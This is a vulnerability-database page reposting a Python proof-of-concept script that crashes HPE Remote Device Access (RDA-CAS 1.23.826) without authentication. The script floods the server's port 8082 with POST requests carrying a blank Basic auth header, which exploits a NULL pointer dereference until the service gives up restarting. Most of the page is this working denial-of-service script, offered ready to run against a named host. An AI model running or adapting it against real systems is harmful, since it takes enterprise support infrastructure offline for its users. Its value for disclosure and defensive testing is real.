Friday, June 25, 2021

HPE RDA-CAS 1.23.826 Denial Of Service

#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# hpfreeze.py
#
# HPE Remote Device Access Unauthenticated Denial of Service
#
# Jeremy Brown [jbrown3264/gmail]
# June 2021
#
# "Designed for the enterprise, HPE RDA (Remote Device Access) provides integrated remote
# connectivity for support automation, device telemetry and remote service delivery."
#
# More info: https://midway.ext.hpe.com
#
# rda-cas web server could not gracefully handle a blank or malformed BASIC auth string.
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x00007f4693362a5c in rda::base64_decode(std::string const&) () from /lib/librda.so.1
#
# Typical NULL ptr deref. It will automatically restart itself after handling one
# of these malformed requests, but quickly sending many of them will make the server
# give up on recovery and become unavailable to users. '=' instead of nothing for an
# auth string will also make it crash in a different parsing routine. The server can
# be configured at setup to listen on either localhost or the network interface.
#
# > ./hpfreeze.py rdacas-host
# ;p;P;p;P;p;P;p;P;p;P;p;P
#
# (If users have the web UI open, they may see "Connection to the RDA-CAS has been lost")
#
# Tested
# - RDA-CAS Version: 1.23.826
# -- rda-cas_1.23-826+deb10_amd64.deb
#
# Fix
# - "the issue will be remediated in an imminent release" with no further reply
#

import sys
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

DEFAULT_PORT = 8082
HOW_MANY_TIMES = 1024

class HPFreeze(object):
def __init__(self, args):
self.target = args.target

def run(self):
target = "https://" + self.target + ':' + str(DEFAULT_PORT)

session = requests.Session()
session.verify = False

# rocket science
headers = {'Authorization':"Basic"}

for i in range(HOW_MANY_TIMES):
try:
resp = session.post(target + "/", headers=headers)
except Exception as error:
if('RemoteDisconnected' in str(error)):
print(";p;P", end='')
print()

return 0

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("target",
type=str,
help="HPE RDA host")

args = parser.parse_args()

return args

def main():
args = arg_parse()

hpf = HPFreeze(args)

result = hpf.run()

if(result > 0):
sys.exit(-1)

if(__name__ == '__main__'):
main()
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore